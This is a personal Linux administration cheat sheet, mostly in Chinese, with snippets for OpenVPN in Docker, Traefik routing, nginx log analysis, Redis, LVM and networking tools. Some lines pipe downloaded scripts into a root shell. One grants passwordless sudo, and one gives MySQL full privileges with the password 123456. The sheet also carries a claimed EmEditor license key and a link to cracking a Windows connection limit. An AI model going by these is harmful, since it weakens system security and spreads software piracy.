#docker 安装openvpn
#docker安装openvpn --begin
export OVPN_DATA=openvpn-data
docker volume create --name $OVPN_DATA #生成文件夹/var/lib/docker/volumes/openvpn-data/_data
#SERVER_IP为服务器的外网IP.比如1.2.3.4
docker run -v $OVPN_DATA:/etc/openvpn --rm kylemanna/openvpn ovpn_genconfig -d -c -C 'AES-256-CBC' -u udp://SERVER_IP -s 192.168.100.0/24
#生成密钥文件,输入密钥和CA名称
docker run -v $OVPN_DATA:/etc/openvpn --rm -it kylemanna/openvpn ovpn_initpki
#开启特权 记得把外网的UDP1194端口映射进来
docker run -v $OVPN_DATA:/etc/openvpn -d -p 1194:1194/udp --restart=on-failure:10 --cap-add=NET_ADMIN --name=openvpn --privileged=true kylemanna/openvpn
#注意
#1. openvpn.conf 需要添加
route 192.168.100.1 255.255.255.0
#2. ovpn_env.sh
declare -x OVPN_DEFROUTE=1
declare -x OVPN_ROUTES=([0]="192.168.100.1/24")
#3. The default DNS is 8.8.8.8 / 8.8.4.4; for deployments in mainland China consider a domestic resolver such as 114.114.114.114
#4. 可以修改 yzytesta.ovpn 文件中的 remote 1.2.3.4 11194 udp 默认的1194端口
#添加用户
#添加不需要密码的用户
docker run -v $OVPN_DATA:/etc/openvpn --rm -it kylemanna/openvpn easyrsa build-client-full testuser nopass
#添加需要密码的用户
docker run -v $OVPN_DATA:/etc/openvpn --rm -it kylemanna/openvpn easyrsa build-client-full testuser
#导出用户证书
docker run -v $OVPN_DATA:/etc/openvpn --rm kylemanna/openvpn ovpn_getclient testuser > testuser.ovpn
#删除用户证书
docker run -v $OVPN_DATA:/etc/openvpn --rm -it kylemanna/openvpn easyrsa revoke user
#更新证书数据库
docker run -v $OVPN_DATA:/etc/openvpn --rm -it kylemanna/openvpn easyrsa gen-crl update-db
#重启openvpn容器
docker restart openvpn
#docker安装openvpn --end
#docker swarm下 links不工作问题
networks:
default:
aliases:
- xxaxx
- service-xxx-manage-api-server-sys
#traefik 反代相关的几种地址类型
# http://traefik-nginxa/xtxt ==> http://nginxa/
labels:
- "traefik.http.services.nginxa.loadbalancer.server.port=9090"
- "traefik.http.routers.nginxa.middlewares=nginxa-stripprefix"
- "traefik.http.middlewares.nginxa-stripprefix.stripprefix.prefixes=/xtxt"
- "traefik.http.routers.nginxa.rule=Host(`nginxa-papa.yy.local`) && PathPrefix(`/xtxt`)"
# http://traefik-nginxa/xtxt ==> http://nginxa/xtxt
labels:
- "traefik.http.services.nginxa.loadbalancer.server.port=9090"
- "traefik.http.routers.nginxa.rule=Host(`nginxa-papa.yy.local`) && PathPrefix(`/xtxt`)"
# http://traefik-nginxa/xtxt ==> http://nginxa/db 待做
labels:
- "traefik.http.services.nginxa.loadbalancer.server.port=9090"
- "traefik.http.routers.nginxa.middlewares=nginxa-stripprefix,nginxa-addprefix"
- "traefik.http.middlewares.nginxa-stripprefix.stripprefix.prefixes=/xtxt"
- "traefik.http.routers.nginxa.rule=Host(`nginxa-papa.yy.local`) && PathPrefix(`/xtxt`)"
- "traefik.http.middlewares.nginxa-addprefix.addprefix.prefix=/db"
#代替htop的工具
glances
#github.com加速相关的域名
github.global-ssl.fastly.net
github.com
#curl下测试网速相关
curl -o /dev/null -w "\n DNS 解析域名的时间\n namelookup:"%{time_namelookup}"\n client和server端建立TCP 连接的时间\n time_connect:"%{time_connect}"\n 从client发出请求;到web的server 响应第一个字节的时间\n time_starttransfer:"%{time_starttransfer}"\n client发出请求;到web的server发送会所有的相应数据的时间\n time_total:"%{time_total}"\n 下载速度 单位 byte/s\n speed_download(byte/s):"%{speed_download}"\n" 'http://hwa.xxx.com/xxx.apk'
#harbor修改配置文件后重启
docker-compose down
cd /opt/harbor
./prepare #这步别忘记
docker-compose up -d
#supervisor
root@b9fd3d2e29cc:/# ln -s /tmp/supervisor.sock /var/run/
root@b9fd3d2e29cc:/# supervisorctl status
crond RUNNING pid 24, uptime 0:39:22
nginx RUNNING pid 23, uptime 0:39:22
php5-fpm FATAL Exited too quickly (process log may have details)
root@b9fd3d2e29cc:/# supervisorctl restart php5-fpm
#TCP queue notes
#SYN (half-open) queue size: max(64, /proc/sys/net/ipv4/tcp_max_syn_backlog)
#accept (full-connection) queue size: min(backlog, /proc/sys/net/core/somaxconn)
#check for queue overflows: netstat -s | egrep "listen|LISTEN"
#accept-queue overflows only: netstat -s | grep "listen"
#tunables live under /proc/sys/net/ipv4/tcp_* (meaning of each parameter still to be documented)
#SYN flooding messages show up in /var/log/messages
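#ss shows the accept-queue usage directly: for LISTEN sockets, Recv-Q is the current queue length and Send-Q the configured limit
ss -lnt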
#mac brew升级python后路径修复
ln -s /usr/local/Cellar/python@3.9/3.9.1_5/bin/python3 /usr/local/bin/python3
ln -s /usr/local/Cellar/python@3.9/3.9.1_5/bin/pip3 /usr/local/bin/pip3
#Use a proxy in the macOS terminal
#assumes the proxy (e.g. Shadowsocks) is already running
export https_proxy=127.0.0.1:1087
export http_proxy=http://127.0.0.1:1087
export all_proxy=socks5://127.0.0.1:1080
#git
git config --global http.proxy 'socks5://127.0.0.1:1080'
git config --global https.proxy 'socks5://127.0.0.1:1080'
git config --global socks.proxy 'socks5://127.0.0.1:1080'
#git覆盖
#! /bin/bash
git fetch --all
git reset --hard origin/master
git pull
#mac 重装CommandLineTools
sudo rm -rf /Library/Developer/CommandLineTools
sudo xcode-select --install
#当忘记输入nohup时挂起当前运行的程序
1.Ctrl+z #挂起程序,注:此时程序为挂起状态,暂停状态 程序未运行
2.jobs -l #查看后台运行或者挂起状态运行程序的信息, 注意目标程序的ID号
3. bg id号 #把暂停状态的ctrl+z的程序放到后台运行 实现nohup的效果
4. fg id号 #把后台运行或者暂停状态的程序恢复到前台运行
#补充nginx日志中基于IP维度的统计ip个数与ip流量
cat count_ip.sh
last_min=$(date -d last-min +%d/%b/%Y:%H:%M);cd /www/wwwlogs/; for ff in `ls *_access.log`; do cat $ff | grep $last_min | awk -F '" "' -v fname=$ff -v llast_min=$last_min '{split($3,ip_tmp,"\"");requests[ip_tmp[1]]++;} END{for(s in requests){printf("%s %s %s %s\n", requests[s],s,fname,llast_min)}}'| sort -nr | head -n 10; done | sort -nr | head -n 20 | sed "1i test_time:\\$last_min" | head -n 25 >> /data/log/count_ip.log
cat ip_tra.sh
last_min=$(date -d last-min +%d/%b/%Y:%H:%M);cd /www/wwwlogs/; for ff in `ls *_access.log`; do cat $ff | grep $last_min | awk -F '"' -v fname=$ff -v llast_min=$last_min '{split($3,ip_tmp," ");requests[$8]+=ip_tmp[2];} END{for(s in requests){printf("%s %s %s %s\n",requests[s],s,fname,llast_min)}}'| sort -nr | head -n 10; done | sort -nr | head -n 20 | sed "1i test_time:\\$last_min" >> /data/log/ip_tra.log
#nginx日志记录添加到cron
root@nginx1:/data/shell# cat count_site.sh
last_min=$(date -d last-min +%d/%b/%Y:%H:%M);cd /var/log/nginx/; for ff in `ls *_access.log`; do cat $ff | grep $last_min | awk -v fname=$ff -v llast_min=$last_min '{sec=substr($4,2,17);requests[sec]++;} END{for(s in requests){printf("%s %s %s\n", requests[s],s,fname)}}'| sort -nr | head -n 10; done | sort -nr | head -n 20 | sed "1i test_time:\\$last_min" >> /data/log/count_site.log
root@nginx1:/data/shell# cat count_url.sh
last_min=$(date -d last-min +%d/%b/%Y:%H:%M);cd /var/log/nginx/; for ff in `ls *_access.log`; do cat $ff | grep $last_min | awk -v fname=$ff -v llast_min=$last_min '{split($7,uri_tmp,"?");requests[uri_tmp[1]]++;} END{for(s in requests){printf("%s %s %s %s\n", requests[s],s,fname,llast_min)}}'| sort -nr | head -n 10; done | sort -nr | head -n 20 | sed "1i test_time:\\$last_min" | head -n 25 >> /data/log/count_url.log
root@nginx1:/data/shell# cat site_tra.sh
last_min=$(date -d last-min +%d/%b/%Y:%H:%M); cd /var/log/nginx/;for ff in `ls *_access.log`; do cat $ff | grep $last_min | awk -v fname=$ff '{sec=substr($4,2,17);requests[sec]+=$10;} END{for(s in requests){printf("%s %s %s\n", requests[s],s,fname)}}' | sort -nr | head -n 10; done | sort -nr | sed "1i test_time:\\$last_min" >> /data/log/site_tra.log
root@nginx1:/data/shell# cat url_tra.sh
last_min=$(date -d last-min +%d/%b/%Y:%H:%M);cd /var/log/nginx/; for ff in `ls *_access.log`; do cat $ff | grep $last_min | awk -v fname=$ff -v llast_min=$last_min '{split($7,uri_tmp,"?");requests[uri_tmp[1]]+=$10;} END{for(s in requests){printf("%s %s %s %s\n",requests[s],s,fname,llast_min)}}'| sort -nr | head -n 10; done | sort -nr | head -n 20 | sed "1i test_time:\\$last_min" >> /data/log/url_tra.log
root@nginx1:/etc/cron.d# cat count_site
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/2 * * * * root /data/shell/count_site.sh
root@nginx1:/etc/cron.d# cat count_url
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/2 * * * * root /data/shell/count_url.sh
root@nginx1:/etc/cron.d# cat site_tra
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/2 * * * * root /data/shell/site_tra.sh
root@nginx1:/etc/cron.d# cat url_tra
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/2 * * * * root /data/shell/url_tra.sh
#nginx日志5
#统计某日志文件夹下的前一分钟的流量排行,行首通过sed添加运行时间
#sed 1 代表第一行 $ 代表最后一行 i 代表在定位的上一行插入 a 代表在定位的最后一行插入
last_min=$(date -d last-min +%d/%b/%Y:%H:%M); for ff in `ls *_access.log`; do cat $ff | grep $last_min | awk -v fname=$ff '{sec=substr($4,2,17);requests[sec]+=$10;} END{for(s in requests){printf("%s %s %s\n", requests[s],s,fname)}}' | sort -nr | head -n 10; done | sort -nr | sed "1i test_time:\\$last_min"
#nginx日志4
#nginx日志统计每分钟的请求流量是多少并排除多余选项,并把文件名带入到awk变量中
last_min=$(date -d last-min +%d/%b/%Y:%H:%M); for ff in `ls *_access.log`; do cat $ff | grep $last_min | awk -v fname=$ff '{sec=substr($4,2,17);requests[sec]+=$10;} END{for(s in requests){printf("%s %s %s\n", requests[s],s,fname)}}' | sort -nr | head -n 10; done
#nginx日志3
#最近一分钟的某文件夹下的统计情况
last_min=$(date -d last-min +%d/%b/%Y:%H:%M); echo $last_min; for ff in `ls *_access.log`; do echo $ff;cat $ff | grep $last_min | awk '{sec=substr($4,2,20);requests[sec]++;} END{for(s in requests){printf("%s %s\n", requests[s],s)}}' | sort -nr | head -n 10; done
#nginx日志1
#日期格式化为 nginx日志中的日期 上一分钟
date -d last-min +%d/%b/%Y:%H:%M:%S
# 适应整个文件夹
for ff in `ls *_access.log`; do echo $ff;cat $ff | awk '{sec=substr($4,2,20);requests[sec]++;} END{for(s in requests){printf("%s %s\n", requests[s],s)}}' | sort -nr | head -n 10; done
#nginx日志分析
#统计每秒访问了多少次 可考虑作为CC的一个指标
cat main.log | awk '{sec=substr($4,2,20);requests[sec]++;} END{for(s in requests){printf("%s %s\n", requests[s],s)}}' | sort -nr | head -n 10
#统计每分钟访问了多少次 可考虑作为CC的一个指标
cat main.log | awk '{sec=substr($4,2,20);requests[sec]++;} END{for(s in requests){printf("%s %s\n", requests[s],s)}}' | sort -nr | head -n 10
#统计每秒钟占用的带宽 $10 为 byte_sent变量的值
cat html_ax_com_access.log | awk '{sec=substr($4,2,20);requests[sec]+=$10;} END{for(s in requests){printf("%s %s\n", requests[s],s)}}' | sort -nr | head -n 10
#统计每分钟占用的带宽 $10 为 byte_sent变量的值
cat html_ax_com_access.log | awk '{sec=substr($4,2,17);requests[sec]+=$10;} END{for(s in requests){printf("%s %s\n", requests[s],s)}}' | sort -nr | head -n 10
#在指定的某个时间,占用带宽最大的url $7为访问的url $10为发送的流量
cat main.log |grep '12/Oct/2020:18:07' | awk '{requests[$7]+=$10;} END{for(s in requests){printf("%s %s\n", requests[s],s)}}' | sort -nr | head -n 10
#在指定的某个时间,占用带宽最大的url $7为访问的url $10为发送的流量 其中把url中按?分隔当着key,只取uri,不取对应的参数
cat main.log | grep '22/Oct/2020:07:47:12' | awk '{split($7,uri_tmp,"?");requests[uri_tmp[1]]+=$10;} END{for(s in requests){printf("%s %s\n",requests[s],s)}}' | sort -nr | head -n 10
#安装toa
#Note (important): toa only supports IPv4 ports
#Check whether these kernel parameters need tuning:
/proc/sys/net/ipv4/tcp_max_syn_backlog
/proc/sys/net/core/somaxconn
#debian9
apt-get update && apt-get full-upgrade # full-upgrade 升级到最新内核 不然后面linux-header版本缺失
init 6
apt-get install linux-headers-`uname -r`
apt-get install gcc make git
cd /opt && git clone https://github.com/Huawei/TCP_option_address.git
cd TCP_option_address/src/
make && make install
mkdir /opt/toa/ && cp toa.ko -r /opt/toa/toa.ko
chmod +x /etc/rc.local
#rc.local
insmod /opt/toa/toa.ko
#清华大学镜像加速站
https://mirrors.tuna.tsinghua.edu.cn/help/mysql/
#linux监控工具
apt-get install iotop htop iptraf
#debian10 镜像地址:
root@debian10:/opt# cat /etc/apt/sources.list
deb http://mirrors.huaweicloud.com/debian buster main non-free contrib
deb-src http://mirrors.huaweicloud.com/debian buster main non-free contrib
deb http://mirrors.huaweicloud.com/debian buster-updates main non-free contrib
deb-src http://mirrors.huaweicloud.com/debian buster-updates main non-free contrib
deb http://mirrors.huaweicloud.com/debian buster-proposed-updates main non-free contrib
deb-src http://mirrors.huaweicloud.com/debian buster-proposed-updates main non-free contrib
deb http://mirrors.huaweicloud.com/debian buster-backports main non-free contrib
deb-src http://mirrors.huaweicloud.com/debian buster-backports main non-free contrib
deb http://mirrors.huaweicloud.com/debian-security buster/updates main non-free contrib
deb-src http://mirrors.huaweicloud.com/debian-security buster/updates main non-free contrib
#dig nslookup
apt-get install dnsutils
yum install bind-utils
#debian 安装 nodejs 12
apt-get update
apt-get install curl dirmngr apt-transport-https lsb-release ca-certificates
curl -sL https://deb.nodesource.com/setup_12.x | bash -
apt-get install nodejs
apt-get install gcc g++ make
npm install -g yarn
#nginx if location rewrite
#nginx if location rewrite
server {
listen 80;
server_name xxx.com;
root /opt/xxx_com/;
set $flag "a";
if ( $request_uri ~* /.well-known/pki-validation/fileauth.txt ) {
set $flag "b";
}
if ($flag = "a") {
rewrite ^/(.*) http://www.xxx.com/$1 permanent;
}
}
#redis批量删除Key
redis-cli -c -p 6379 -h xxx.xxx.xxx.xxx keys 'xxx*' | xargs redis-cli del
#debian9 apt-get 安装python3.7
vim /etc/apt/sources.list
deb http://mirrors.163.com/debian/ testing main
apt-get update
apt-get install python3
# 主要是使用testing源
#redis-cli批量执行命令:
cat cmd.txt | redis-cli -c -p 7000 -h 10.100.12.65
cat cmd.txt
SADD set:ma:version "VSTM000GV387"
SADD set:ma:version "M500AB0303.0106"
SADD set:ma:version "VSTM000GV323"
#curl 请求非可见字符
#base64方式
echo "eyJhIjoiXHgaGiJ9" | base64 -d | xargs -I F curl --proxy 127.0.0.1:8080 -H "Content-Type:application/json" -H "Data_Type:msg" -X POST --data 'F' http://10.100.9.24:8090/
#16进制方式
echo '7b613a5c781a1a7d' | xxd -r -p | xargs -I F curl --proxy 127.0.0.1:8080 -H "Content-Type:application/json" -H "Data_Type:msg" -X POST --data 'F' http://10.100.9.24:8090/
#--data-binary 方式
curl -i -s -k -X $'POST' \
-H $'Host: 10.100.9.24:8090' -H $'User-Agent: curl/7.64.1' -H $'Accept: */*' -H $'Content-Type:application/json' -H $'Data_Type:msg' -H $'Content-Length: 8' -H $'Connection: close' \
--data-binary $'{a:\\x\x1a\x1a}' \
$'http://10.100.9.24:8090/'
#xargs on macOS
#the -i and -r options are not the same as on Linux; use -I on macOS
#mac
echo "c3RyCg==" | base64 -d | xargs -I F echo aFb
#linux
echo "c3RyCg==" | base64 -d | xargs -i echo a{}b
#arp信息统计
#arp1.txt
nohup tcpdump -nvv arp > /tmp/arp1.txt
cat arp1.txt | awk '{print $11}' | sort | uniq -c | sort -nr | head -n 20
cat arp1.txt | awk '{print $13}' | sort | uniq -c | sort -nr | head -n 20
#交换机添加三层安全策略
acl number 3000
rule 0 deny tcp source 10.100.1.3 0 destination 123.57.55.183 0
rule 5 deny tcp source 10.100.1.3 0 destination 10.100.9.25 0
#
traffic classifier tc1 operator and
if-match acl 3000
#
traffic behavior tb1
deny
#
traffic policy tp1
classifier tc1 behavior tb1
interface GigabitEthernet0/0/3
traffic-policy tp1 inbound
#hbase 根据时间区间来查询
echo "scan 'XbLog' , {TIMERANGE => [1575531294524, 1575535019000] }" | hbase shell
#hbase根据rowkey来查询
scan 'hour_first_source', {FILTER => "RowFilter(=, 'regexstring:004_9223370461325575807')"}
#xenserver 重启api
xe-toolstack-restart
xsconsole
#xenserver 将当前服务器设置为主服务器 可用于pool中的slave单独运行
xe pool-emergency-transition-to-master
#tree 列目录,只列出文件,按行来显示
tree -ifF /tmp | grep -v '/$'
#显示文件大小
tree -ifFsD /tmp/ | grep -v '/$'
#alias to count per-IP connections for a given port; use as: hostporta 80
alias hostporta="_a(){ netstat -an | grep -v unix | grep :\$1\\\s | awk '{print \$5}' | awk -F ':' '{print \$1}' | sort |uniq -c ; }; _a"
#生成ip段并保存为文件
echo 192.168.{1..255}.{1..255} | tr ' ' '\012' > /tmp/xx.txt
#Windows 2008 R2 安装激活终端服务破解远程最大连接数2
https://wenku.baidu.com/view/98b3b92003d8ce2f00662359.html
#sgdisk方式快速创建lvm
sgdisk -n 1:0:0 /dev/vdb -t 1:8e00
pvcreate /dev/vdb1
vgextend debian-vg /dev/vdb1
lvextend -l +100%free /dev/debian-vg/root
xfs_growfs /dev/debian-vg/root
df -h
#快速创建lvm
parted -a optimal -s /dev/vdb mklabel msdos mkpart primary 0% 100% toggle 1 lvm
parted /dev/vdb toggle 1 lvm # set /dev/vdb1 to linux lvm
parted /dev/vdb rm 1 #del /dev/vdb1
parted -a optimal -s /dev/vdb mklabel msdos mkpart primary 0% 100% toggle 1 lvm
pvcreate /dev/vdb1
vgextend debian-vg /dev/vdb1
lvextend -l +100%free /dev/debian-vg/root
xfs_growfs /dev/debian-vg/root
df -h
#debian rc.local
root@ecs-cdc2-0019:~# cat /lib/systemd/system/rc.local.service
# This file is part of systemd.
#
# systemd is free software; you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation; either version 2.1 of the License, or
# (at your option) any later version.
# This unit gets pulled automatically into multi-user.target by
# systemd-rc-local-generator if /etc/rc.local is executable.
[Unit]
Description=/etc/rc.local Compatibility
ConditionFileIsExecutable=/etc/rc.local
After=network.target
[Service]
Type=forking
ExecStart=/etc/rc.local start
TimeoutSec=0
RemainAfterExit=yes
GuessMainPID=no
[Install]
WantedBy=multi-user.target
#其中新增的为
#[Install]
#WantedBy=multi-user.target
root@ecs-cdc2-0019:~# cat /etc/rc.local
#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.
#
# By default this script does nothing.
echo 11 >> /opt/t.txt
exit 0
#注意 rc.local第一行一定不能为空,
chmod +x /etc/rc.local
#开启rc.local服务
systemctl enable rc-local
# 检验服务有没有加成功 ls /etc/systemd/system/multi-user.target.wants/
#启动服务
systemctl start rc-local
#查看后台运行程序的输出 stdout ( nohup、setsid、(&)和disown 这几种方式的后台运行都可以)
strace -p<pid> -s9999 -e write
strace -p<pid> -s9999 -e write=3
#parted 分区
parted /dev/xvde mklabel gpt
parted /dev/xvdf mklabel gpt
parted /dev/xvde mkpart primary 1 100%
parted /dev/xvdf mkpart primary 10G
parted /dev/xvdf mkpart primary 10G 20G
parted /dev/xvdf mkpart primary 20G 30G
parted /dev/xvdf mkpart primary 30G 100%
#rm -rf排除文件
rm -rf !(ca.2019-07-10|cb.2019-07-10)
rm -rf !(*2019-07-10)
#仅保留括号中符合条件的文件,其余全部删除,一般用在清除日志文件件用,保留部份文件,
rm -rf !(path_to_file/test_0{3,5}.jpg)
#iterm2-zmodem rz sz
https://github.com/luxihk/iterm2-zmodem
#jdk url
https://packages.baidu.com/app/jdk-8/
#macOS: list listening ports
lsof -P -i TCP -s TCP:LISTEN
#equivalent to netstat -tlnp on Linux
#tail grep save 实时保存文件
tail -f /mydir/myfile | grep --line-buffered "searchterm" >> outfile #注意grep的 --line-buffered 参数
#查看网络流量连接信息 jnettop
#emeditor永久授权正版激活密钥:DMAZM-WHY52-AX222-ZQJXN-79JXH
#cat方式保存文件
cat > /tmp/test.sh <<EOF
#!/bin/bash
ls
whoami
pwd
EOF
#更新文件夹相同的目录结构内容,比如常见的升级 patch update
rsync --progress --inplace -r update/* one #强制替换
rsync --progress --update -r update/* one #update文件夹中的文件时间必须比目标文件的文件时间新才会完成替换
yes|cp -ruv update/* one # 也必须要满足文件时间条件才会覆盖
#keytool导入证书
keytool -import -keystore "/home/tomcat/jdk1.7.0_60/jre/lib/security/cacerts" -storepass changeit -keypass changeit -alias oss -file osscas.cer
#批量添加IP到IPTABLES中
cat 6.txt | grep "photo" | awk '{print $1}' | sort | uniq -c | sort -nr |head -n 10 | awk '{print $2}' | xargs -i iptables -I INPUT -s {} -j DROP
#python脚本批量删除redis scan pipeline
import redis
import random
import string
import time
from rediscluster import StrictRedisCluster #pip install redis-py-cluster
nodes = [{"host": "172.16.18.107", "port": "7003"}]
r = StrictRedisCluster(startup_nodes=nodes, decode_responses=True)
def del_keys_with_pipe():
start_time = time.time()
result_length = 0
pipe = r.pipeline()
for key in r.scan_iter(match='dba_*', count=5000):
pipe.delete(key)
result_length += 1
if result_length % 5000 == 0:
pipe.execute()
pip_time = time.time()
print "use pipeline scan time ", time.time() - start_time
pipe.execute()
print "use pipeline end at:", time.time() - pip_time
print "use pipeline ways delete numbers:", result_length
def main():
del_keys_with_pipe()
if __name__ == '__main__':
main()
#redis scan 批量删除
for i in {1..1000}
do
t=$(($i*5000))
echo $t
cmdstr="/home/redis/redis-3.2.9/src/redis-cli -c -h 172.31.10.157 -p 7000 scan ${t} match streamChain:all:integrity:M* count 10000 | grep stream | xargs -i /home/redis/redis-3.2.9/src/redis-cli -c -h 172.31.10.157 -p 7000 del {}"
eval $cmdstr
done
#文件每行按长度排序 bash sort longest line
cat monitor.txt | awk '{print length, $0}' | sort -n -r | head -n 10
#gdb插件
gef (https://github.com/hugsy/gef)
gdbinit(https://github.com/gdbinit/Gdbinit)
peda(https://github.com/longld/peda)
#代替scp的快速传输软件
tsunami-udp
#crontab: running a job every few hours, correct and incorrect spellings
* */1 * * * #wrong: the minute field is *, so this runs every minute, not once an hour
0 */1 * * * #correct: once an hour, at minute 0
0 */3 * * * #correct: every 3 hours, at minute 0
*/60 * * * * #the minute field only goes up to 59, so this collapses to minute 0, i.e. hourly
*/120 * * * * root /opt/clean.sh #same problem: this is NOT every 2 hours; use "0 */2 * * *" (and remember the user field in /etc/cron.d entries)
#定时删除过期日志
cat /opt/clean.sh
#!/bin/bash
find /home/tomcat/tomcat-7.0.54/logs/ -mtime +0.4 -name "*2018-*" -exec rm {} \;
cat /etc/cron.d/clean
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/120 * * * * root /opt/clean.sh
#More on find -mtime
find . -mtime N
#read N as N * 24 hours:
#+1 means older than 1*24 + 24 hours (more than 48h ago)
#+0 means older than 0*24 + 24 hours (more than 24h ago)
#1 means between 24 and 1*24 + 24 (= 48) hours ago
#0 means between 0 and 0*24 + 24 (= 24) hours ago
#-1 means within the last 24 hours, possibly even a future timestamp
#rc.local 不生效
#确保 rc-local sysv-rc 服务存在
#确保rc.local 第一行存在 #!/bin/bash
apt-get install initscripts
chmod +x /etc/rc.local
#Kubernetes创建pod一直处于ContainerCreating open /etc/docker/certs.d/registry.access.redhat.com/redhat-ca.crt: no such file or directory
yum install python-rhsm-certificates #检查/etc/rhsm/ca/redhat-uep.pem 文件是否存在, 如果存在不进行如下步骤
wget http://mirror.centos.org/centos/7/os/x86_64/Packages/python-rhsm-certificates-1.19.10-1.el7_4.x86_64.rpm
rpm2cpio python-rhsm-certificates-1.19.10-1.el7_4.x86_64.rpm | cpio -div
cp redhat-uep.pem /etc/rhsm/ca
ln -s /etc/rhsm/ca/redhat-uep.pem /etc/docker/certs.d/registry.access.redhat.com/redhat-ca.crt
#root sudo
vi /etc/sudoers
zabbix ALL=(ALL:ALL) NOPASSWD:ALL
root ALL=(ALL) ALL
#sed多行删除与替换
#sed 多行删除
sed -i '/java\.lang\.ClassCastException0.*/{:n;N;/Thread\.java:745/!bn};d' t.txt
#sed 多行替换
sed '/<Directory .*>/{:n;N;/<\/Directory>/!bn};s/\n.*\n/\n Options None\n AllowOverride None\n Order deny,allow\n Deny from all\n/' urfile
#python查看包路径
import redis
print redis.__file__
#apt-get 安装的zookeeper 设置JVM内存大小
/usr/share/zookeeper/bin/zkEnv.sh
export JVMFLAGS="-Xmx2048m -Xms2048m"
#linux倒序显示
root@debian:/opt# tac /tmp/passwd
root@debian:/opt# sed '1!G;h;$!d' /tmp/passwd
root@debian:/opt# awk '{a[NR]=$0}END{for(i=NR;i>0;i--)print a[i]}' /tmp/passwd
#zk zookeeper 前台启动,用户显示错误信息,方便排查错误
zkServer.sh start-foreground
apt-get install curl software-properties-common
curl -sL https://deb.nodesource.com/setup_10.x | bash -
apt-get update
apt-get install nodejs
#linux tcpping
apt-get install tcptraceroute bc
wget http://www.vdberg.org/~richard/tcpping
tcpping x.x.x.x xxx
yum install tcptraceroute bc
#tcpping
tcping x.x.x.x xxx
psping x.x.x.x xxx
#linux
tcpping
tcproute
#linux
tcptraceroute
#重置centos7.x root密码
#问题:centos7怎么进入单用户模式
#答案:在grub2菜单,按e编辑;找到linux16开头的那一行,在最后加上init=/bin/bash;
#这样做是只读模式,如果要改成读写模式还需要把linux16开头那一行中间的ro改成rw;
#如果你用的是kvm做了console连接授权,还要把授权的console=ttyS0去掉,再加上init=/bin/bash;
#最后按ctrl+x
init=/bin/bash
mount -o remount,rw /
passwd root
exec /sbin/init 或
exec /sbin/reboot
#增加swap空间
dd if=/dev/zero of=/var/swapfile1 bs=1024 count=209715200
mkswap /var/swapfile1
swapon /var/swapfile1
#append to /etc/fstab: /var/swapfile1 swap swap defaults 0 0
#md5文件hash
for i in {"/etc","/bin","/sbin","/usr/bin","/usr/sbin"};do md5deep -r $i >>/usr/local/file_hashs.txt;done
#ipvsadm
#查看具体连接
ipvsadm -lcn
#zk 导出
git clone https://github.com/ctapmex/zkTreeUtil.git #zookeeper zk 导出工具
./zktreeutil.sh -z 172.16.132.176:2181 -of ./a.txt -e
./zktreeutil.sh -z 172.16.132.176:2181 -ox ./b.txt -e
#ps 查看命令的全部内容
ps aux----->ps auxww # add ww
ps aux --width=10000
#add swap
#add swap
dd if=/dev/zero of=/swapfile bs=1M count=4096 && mkswap /swapfile && swapon /swapfile
vim /etc/fstab
/swapfile swap swap defaults 0 0
vim /etc/sysctl.conf
vm.swappiness = 0
#tcpdump抓包并保存
nohup tcpdump port 9980 -s0 -G 86400 -Z root -w /opt/bd_%Y_%m%d_%H%M_%S.pcap &
#如果wireshark 打开报错 可尝试 修复
pcapfix bd.pcap
#mysql添加账号
GRANT ALL PRIVILEGES ON *.* TO 'testa'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;
FLUSH PRIVILEGES;
GRANT ALL PRIVILEGES ON *.* TO 'testa'@'localhost' IDENTIFIED BY '123456' WITH GRANT OPTION;
FLUSH PRIVILEGES;
#fping 查看存活主机
fping -a -g 172.21.10.1 172.21.11.254 2> /dev/null
#fping 查看不存活主机
fping -u -g 172.21.10.1 172.21.11.254 2> /dev/null
#Linux 下编译 Mac 和 Windows 64位可执行程序
CGO_ENABLED=0 GOOS=darwin GOARCH=amd64 go build main.go
CGO_ENABLED=0 GOOS=windows GOARCH=amd64 go build main.go
#把大文件按行分隔成小文件
split -l 1000000 pinggood.txt split_ -d
#linux调试
objdump
edb #https://github.com/eteran/edb-debugger
#nmap1
nmap -iL ok_8123.txt -p 8123 -n -T5 -oG - > ./8123_result.txt
#nginx rewrite
location ~* ^/get{
rewrite ^/get?(.*)$ /get.php?$1 last;
}
#http://www.so-cools.com/get?xxx=123==>http://www.so-cools.com/get.php?xxx=123
#Inspect LV / partition / disk layout and mount an LV partition (works for img files too)
lsblk #clearer than mount output
#Cinder on LVM creates one LV per VM; to find out what is inside one:
fdisk -l /dev/centos/volume-ac76794d-8045-4147-98b5-31683a7cc476
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 65536 bytes / 65536 bytes
Disk label type: dos
Disk identifier: 0x00000000
Device Boot Start End Blocks Id System
/dev/centos/volume-ac76794d-8045-4147-98b5-31683a7cc476p1 * 16065 2088449 1036192+ 83 Linux
#Key values:
#Units = sectors of 1 * 512 = 512 bytes  (sector size)
#Start = 16065
#so the byte offset is 16065 * 512 = 8225280, and the mount command becomes
mount -o loop,offset=8225280 /dev/centos/volume-ac76794d-8045-4147-98b5-31683a7cc476 /mnt/xx
#Reference: https://unix.stackexchange.com/questions/82314/how-to-find-the-type-of-img-file-and-mount-it
#the offset can also be computed inline:
mount -o loop,ro,offset=$(( 512*1526301 )) /dev/xxxd /mnt/
#debian安装node
apt-get autoremove node
apt-get autoremove npm
curl -sL https://deb.nodesource.com/setup | bash -
apt-get install nodejs
npm cache clean -f
npm install -g n
n stable
#debian apt安装oracel jdk
